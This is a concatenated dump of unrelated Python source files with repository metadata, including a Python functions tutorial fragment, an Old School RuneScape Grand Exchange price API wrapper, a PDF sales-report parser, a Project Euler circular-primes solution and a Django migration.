# Code which is not in tab - is outside of the function
print("Not in function")
say_hi("Ben", 30)
result = cube(5)
print(str(result))
sum_result = my_sum(1, 5)
print(str(sum_result))
# specify strict types
def greeting(name: str) -> str:
return "name " + name
print(greeting("greet"))
# var args
def var_args_fun(*args):
# args become a tuple
print(type(args))
print(args)
def var_kargs_fun(**kargs):
# kargs become a dictionary
print(type(kargs))
print(kargs)
# we can combine
def var_args_kargs_fun(*args, **kargs):
print(args)
print(kargs)
var_args_fun("aaa", "bbb", "ccc")
var_kargs_fun(aaa="aaa", bbb="bbb")
var_args_kargs_fun("aaa", "vvv", aaa="aaa", bbb="bbb")
# there could be aliases for existing types and we may pass function as method parameter as a callback
# https://docs.python.org/3/library/typing.html
# there could be generics as well
# TODO
|
[
"kanstantsin_slisenka@epam.com"
] |
kanstantsin_slisenka@epam.com
|
0394425acf0ab2d9024c5ea5110df0c57dcc779e
|
175f90e98b52a03fe87f79617eb0f4bd561182de
|
/grandexchange.py
|
154e455a607c0a4979bb0b1cc5eca335bcf8b2ad
|
[
"MIT"
] |
permissive
|
AdamKBeck/OSRS-API-Wrapper
|
c829ec20d0178d9d311717b0631ef058810ff9b8
|
d32253ced31170118c12e930ad1134eabbbe3359
|
refs/heads/master
| 2020-12-27T10:20:42.937766
| 2020-01-04T19:16:48
| 2020-01-04T19:16:48
| 237,867,522
| 0
| 0
|
MIT
| 2020-02-03T02:02:34
| 2020-02-03T02:02:34
| null |
UTF-8
|
Python
| false
| false
| 3,096
|
py
|
import const
import urllib.request
import json
import warnings
from item import Item
from pricetrend import PriceTrend
from priceinfo import PriceInfo
class GrandExchange(object):
# OSBuddy is an unofficial API, but it is more accurate than the offical API.
# They give more significant figures than the offical API and the values
# are closer to the actively traded prices.
@staticmethod
def _osbuddy_price(id):
# TODO: remove this. OSBuddy no longer has a public API?
warnings.warn(
"OSBuddy no longer provides a public API. This functionality will be removed.",
DeprecationWarning,
stacklevel=2,
)
osb_uri = const.OSBUDDY_PRICE_URI + str(id)
osb_price = None
try:
osb_response = urllib.request.urlopen(osb_uri)
osb_data = osb_response.read()
encoding = osb_response.info().get_content_charset("utf-8")
osb_response.close()
osb_json_data = json.loads(osb_data.decode(encoding))
osb_price = osb_json_data["overall"]
except Exception:
pass # oh well, price will just be less accurate
return osb_price
@staticmethod
def item(id, try_osbuddy=False):
uri = const.GE_BY_ID + str(id)
try:
response = urllib.request.urlopen(uri)
except urllib.error.HTTPError:
raise Exception("Unable to find item with id %d." % id)
data = response.read()
encoding = response.info().get_content_charset("utf-8")
response.close()
osb_price = None
if try_osbuddy:
osb_price = GrandExchange._osbuddy_price(id)
json_data = json.loads(data.decode(encoding))["item"]
name = json_data["name"]
description = json_data["description"]
is_mem = bool(json_data["members"])
type = json_data["type"]
type_icon = json_data["typeIcon"]
# price info/trends
current = json_data["current"]
today = json_data["today"]
day30 = json_data["day30"]
day90 = json_data["day90"]
day180 = json_data["day180"]
curr_trend = PriceTrend(current["price"], current["trend"], None)
trend_today = PriceTrend(today["price"], today["trend"], None)
trend_30 = PriceTrend(None, day30["trend"], day30["change"])
trend_90 = PriceTrend(None, day90["trend"], day90["change"])
trend_180 = PriceTrend(None, day180["trend"], day180["change"])
price_info = PriceInfo(
curr_trend, trend_today, trend_30, trend_90, trend_180, osb_price
)
return Item(id, name, description, is_mem, type, type_icon, price_info)
def main():
abyssal_whip_id = 4151
whip = GrandExchange.item(abyssal_whip_id)
print(whip.name, whip.description, whip.price(), sep="\n")
rune_axe_id = Item.get_ids("rune axe")
rune_axe = GrandExchange.item(rune_axe_id)
print(rune_axe.name, rune_axe.description, rune_axe.price(), sep="\n")
if __name__ == "__main__":
main()
|
[
"schelthoff.chase@gmail.com"
] |
schelthoff.chase@gmail.com
|
b1302dd60d3a32627cb6ad996f9211ce709fda77
|
39aee520641a16b297c14d3bd3a85f2f5d892617
|
/sub.py
|
22a52cd4676ce28b618e26afceb38216065af4c8
|
[] |
no_license
|
AlexJJGreen/dsm_pdf_stripper
|
ea90627cf57e646a2ad83d205fad20c676f6202f
|
de282807fc42fdb5994b0dc16588dcbb7fb7ca1f
|
refs/heads/main
| 2023-04-28T01:02:18.853246
| 2021-04-30T16:16:46
| 2021-04-30T16:16:46
| 352,024,609
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,427
|
py
|
import PyPDF2 as pp
import csv
import pandas as pd
import shutil
from ordered_set import OrderedSet
import xlsxwriter
from re import search
#### --- GLOBALS --- ####
doc = pp.PdfFileReader("Story Analysis WTD INTERNATIONAL.pdf")
total_pages = doc.getNumPages()
store_datasets = []
story_datasets = {}
# cat_datasets = {}
# week to date counter, on false ignore pages, append current story_dataset to store_dataset
wtd = True
# mutate str to float on numeric cols, nb. order of ops prevents refactor, don't touch!
def parse_to_numeric(filtered_text):
parsed_text = []
for i in filtered_text:
if "(" in i:
i = i.replace("(", "-")
if ")" in i:
i = i.replace(")", "")
if "%" in i:
i = i.replace("%", "")
if "," in i:
i = i.replace(",", "")
if i == "n/a" or i == "N/A":
i = 0
if (i != None) or (i != "Total"):
float(i)
parsed_text.append(i)
return parsed_text
for page in range(total_pages):
# get page extract text
current_page = doc.getPage(page).extractText()
# split into list
raw_text = current_page.splitlines()
# convert to python str
for i in range(len(raw_text)):
str(raw_text[i])
# check page type
if raw_text[0] == "STORY ANALYSIS YESTERDAY":
#print("triggered")
wtd = False
# print(story_datasets)
try:
story_datasets["STORY"] = list(OrderedSet(story_datasets["STORY"]))
for i in range(len(story_datasets["Unit Mix %"])):
if story_datasets["Item L3 Desc"][i] != "Total":
story_datasets["STORY"].insert(i, story_datasets["STORY"][i -1])
if story_datasets["Unit Mix %"][i] == "n/a%":
story_datasets["Units"].insert(i, 0)
if i != 0:
story_datasets["store"].insert(i, story_datasets["store"][i - 1])
# parse Sales £, Units, Cash Mix %, Unit Mix % to float
story_datasets["Sales £"] = parse_to_numeric(story_datasets["Sales £"])
story_datasets["Cash Mix %"] = parse_to_numeric(story_datasets["Cash Mix %"])
#print(story_datasets["Cash Mix %"])
for i in story_datasets["Cash Mix %"]:
if (i != None) or (i != "Total"):
i = float(i) / 100
story_datasets["Unit Mix %"] = parse_to_numeric(story_datasets["Unit Mix %"])
for i in story_datasets["Unit Mix %"]:
if (i != None) or (i != "Total"):
i = float(i) / 100
store_datasets.append(story_datasets)
#print(store_datasets)
except:
# print("passed")
pass
story_datasets = {}
elif raw_text[0] == "STORY ANALYSIS WEEK TO DATE":
# check page is not empty
if len(raw_text) >= 9:
# set bool trigger for WTD pages without title
wtd = True
# get meta
story_datasets["store"] = [raw_text[1]]
del raw_text[0:2]
# get dict keys --> {Store: "", STORY: [], Item L3 Desc: [], Sales £: [], Units: [], Cash Mix %: [], Unit Mix %: []}
for i in range(6):
story_datasets[raw_text[i]] = []
del raw_text[0:6]
# strip story names into one col and append to datasets, break point on list i == Total && i + 1 == Total
c = 0
for i in range(len(raw_text)):
if (raw_text[i] == "Total") and (raw_text[i + 1] == "Total"):
break
else:
story_datasets["STORY"].append(raw_text[i])
c += 1
del raw_text[0:c]
# cash and units mix cols ALWAYS contain %, identify and /2 to get col length, strip and append to dict
col_len = int(sum("%" in s for s in raw_text)/2)
for i in range(len(raw_text) - col_len,len(raw_text)):
story_datasets["Unit Mix %"].append(raw_text[i])
del raw_text[len(raw_text) - col_len:]
for i in range(len(raw_text) - col_len,len(raw_text)):
story_datasets["Cash Mix %"].append(raw_text[i])
del raw_text[len(raw_text) - col_len:]
# strip item desc append to Item L3 Desc
for i in range(0,col_len):
story_datasets["Item L3 Desc"].append(raw_text[i])
del raw_text[0:col_len]
# strip Sales £, append and del
for i in range(0,col_len):
story_datasets["Sales £"].append(raw_text[i])
del raw_text[0:col_len]
#append last list to Units
for i in range(len(raw_text)):
story_datasets["Units"].append(raw_text[i])
else:
pass
elif (raw_text[0] == "STORY") and (wtd is True):
# delete column titles
del raw_text[0:6]
# stories alway UPPPER, append to stories
story_appended_count = 0
for text in raw_text:
if text.isupper():
story_datasets["STORY"].append(text)
story_appended_count += 1
del raw_text[0:story_appended_count]
# cash and units mix cols ALWAYS contain %, identify and /2 to get col length, strip and append to dict
col_len = int(sum("%" in s for s in raw_text)/2)
for i in range(len(raw_text) - col_len,len(raw_text)):
story_datasets["Unit Mix %"].append(raw_text[i])
del raw_text[len(raw_text) - col_len:]
for i in range(len(raw_text) - col_len,len(raw_text)):
story_datasets["Cash Mix %"].append(raw_text[i])
del raw_text[len(raw_text) - col_len:]
# strip item desc append to Item L3 Desc
for i in range(0,col_len):
story_datasets["Item L3 Desc"].append(raw_text[i])
del raw_text[0:col_len]
# strip Sales £, append and del
for i in range(0,col_len):
story_datasets["Sales £"].append(raw_text[i])
del raw_text[0:col_len]
# append last list to Units
for i in range(len(raw_text)):
story_datasets["Units"].append(raw_text[i])
else:
pass
# datasets to df -> to excel
with pd.ExcelWriter('stor_analysis.xlsx') as writer:
for dataset in store_datasets:
sheetname = dataset["store"][0]
df = pd.DataFrame.from_dict(dataset)
df.set_index(["store", "STORY", "Item L3 Desc"], inplace=True)
df.to_excel(writer, engine='xlsxwriter', sheet_name=sheetname)
# collate store, ks, inno to df
ks_data = []
inno_data = []
solus_data = []
for dataset in store_datasets:
if "Karstadt" in dataset["store"][0]:
dataset["Grouping"] = ["Karstadt" for x in range(len(dataset["store"]))]
del dataset["store"]
df = pd.DataFrame.from_dict(dataset)
df.set_index(["Grouping", "STORY", "Item L3 Desc"], inplace=True)
ks_data.append(df)
elif "Inno" in dataset["store"][0]:
dataset["Grouping"] = ["Inno" for x in range(len(dataset["store"]))]
del dataset["store"]
df = pd.DataFrame.from_dict(dataset)
df.set_index(["Grouping", "STORY", "Item L3 Desc"], inplace=True)
inno_data.append(df)
elif ("Inno" not in dataset["store"][0]) and ("Karstadt" not in dataset["store"][0]) and (dataset["store"][0] != "INTERNATIONAL"):
dataset["Grouping"] = ["Solus" for x in range(len(dataset["store"]))]
del dataset["store"]
df = pd.DataFrame.from_dict(dataset)
df.set_index(["Grouping", "STORY", "Item L3 Desc"], inplace=True)
solus_data.append(df)
# print(ks_data)
collated_dfs = []
collated_dfs.append(ks_data)
collated_dfs.append(inno_data)
collated_dfs.append(solus_data)
for dfs in collated_dfs:
collated_df = pd.concat(dfs)
collated_df["Sales £"] = collated_df["Sales £"].apply(pd.to_numeric)
collated_df["Units"] = collated_df["Units"].apply(pd.to_numeric)
collated_df["Cash Mix %"] = collated_df["Sales £"].apply(pd.to_numeric)
collated_df["Unit Mix %"] = collated_df["Units"].apply(pd.to_numeric)
sheetname = collated_df.index.get_level_values(0)[0]
collated_df = collated_df.groupby(level=[1,2]).sum().reset_index()
collated_df.set_index(["STORY","Item L3 Desc"], inplace=True)
stories = list(collated_df.index.unique(level='STORY'))
collated_df_total = collated_df[collated_df.index.get_level_values("Item L3 Desc") == "Total"]
cash_total = collated_df["Sales £"].loc[("Total","Total")]
print(cash_total)
unit_total = collated_df["Units"].loc[("Total","Total")]
print(collated_df_total["Cash Mix %"])
collated_df_total["Cash Mix %"] = collated_df_total["Cash Mix %"].apply(lambda x: round(float(x / cash_total),3))
collated_df_total["Unit Mix %"] = collated_df_total["Unit Mix %"].apply(lambda x: round(float(x / unit_total),3))
collated_df_total.sort_values(by=["Cash Mix %"], inplace=True, ascending=False)
collated_df_total.to_excel(writer, engine='xlsxwriter', sheet_name=sheetname + "_stories")
totals = []
unit_totals = []
for story in stories:
totals.append(collated_df["Cash Mix %"].loc[(story,"Total")])
unit_totals.append(collated_df["Unit Mix %"].loc[(story,"Total")])
items = list(collated_df.index.unique(level='Item L3 Desc'))
for s,t in zip(stories,totals):
for item in items:
try:
collated_df["Cash Mix %"].loc[(s,item)] = round(float(collated_df["Cash Mix %"].loc[(s,item)] / t),3)
except:
pass
for s,ut in zip(stories,unit_totals):
for item in items:
try:
collated_df["Unit Mix %"].loc[(s,item)] = round(float(collated_df["Unit Mix %"].loc[(s,item)] / ut),3)
except:
pass
# collated_df.reindex(collated_df_total.index)
collated_df.to_excel(writer, engine='xlsxwriter', sheet_name=sheetname)
|
[
"alexjjgreen@gmail.com"
] |
alexjjgreen@gmail.com
|
e2333991b304b2918619d52caec66de11002b170
|
65157ac38f5b59f3871b086658c3bcac5490af36
|
/PE_Q35.py
|
95e2259118844b398202703b0f2359621e066a6b
|
[] |
no_license
|
geooff/ProjectEulerSolutions
|
590dba1e786ab6ca0f8c9aeda94c74f7603831a7
|
b94d44b074f1a0039973ec01760aafa584520ba4
|
refs/heads/master
| 2023-02-05T08:47:01.954976
| 2023-01-27T17:06:26
| 2023-01-27T17:06:26
| 124,963,886
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,290
|
py
|
"""
The number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719,
are themselves prime.
There are thirteen such primes below 100:
2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.
How many circular primes are there below one million?
"""
def eratosthenes(n):
"""Yields the sequence of prime numbers via the Sieve of Eratosthenes."""
D = {} # map composite integers to primes witnessing their compositeness
q = 2 # first integer to test for primality
primes = []
while q <= n:
p = D.pop(q, None)
if p:
x = p + q
while x in D:
x += p
D[x] = p
else:
D[q * q] = q
primes.append(q)
q += 1
return primes
primes = eratosthenes(1000000)
i = 0
circular_primes = 0
while primes:
v = str(primes[i])
local_primes = []
for j in range(len(v)):
if (lookup := int(v[j:] + v[:j])) not in primes:
primes.pop(i)
break
local_primes.append(lookup)
if len(local_primes) == len(v):
local_primes = set(local_primes)
circular_primes += len(local_primes)
for k in local_primes:
primes.remove(k)
print(circular_primes)
|
[
"geoffbeamish@gmail.com"
] |
geoffbeamish@gmail.com
|
6d74b138ea984813b2a78415fafb8ca57a86d304
|
58dd69ad78a107255f1b057cc3a77d2f407f0586
|
/garden/migrations/0005_auto_20180611_1153.py
|
3583e4b22885bffe96be8ac0e91f9c7c08025107
|
[] |
no_license
|
BartoszLewosz/Maintenance_ticketing_system
|
4598b8002622af6f040fad4511e8824a2dd3a208
|
61544a12ba8409be34ee4ffecca343144de130d9
|
refs/heads/master
| 2022-04-01T14:59:36.379216
| 2022-03-07T16:17:53
| 2022-03-07T16:17:53
| 133,713,594
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 577
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-06-11 11:53
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('garden', '0004_auto_20180523_2038'),
]
operations = [
migrations.AlterField(
model_name='problem',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
[
"bartosz.lewosz@gmail.com"
] |
bartosz.lewosz@gmail.com
|
5252de910fb7351af98dc307cd1b89c9a3b3d065
|
3afcbc632db73e87a8b1ce8e3a5223c5a5da1451
|
/source/bonfire/orchestrator_demo_backup/AyC/__init__.py
|
c24dd585df60997da5840312cc73bce2647253e1
|
[] |
no_license
|
ruben11291/master-thesis
|
cc32ff790dd6f5dd8dcc9305460419ca2ece0e54
|
1668bfa96bafdf5ab7ffffcf8e1b9dbf041772d7
|
refs/heads/master
| 2020-06-03T20:55:35.957604
| 2014-10-09T13:58:34
| 2014-10-09T13:58:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24
|
py
|
from geoserver import *
|
[
"deimos@deimos-virtual-machine.(none)"
] |
deimos@deimos-virtual-machine.(none)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.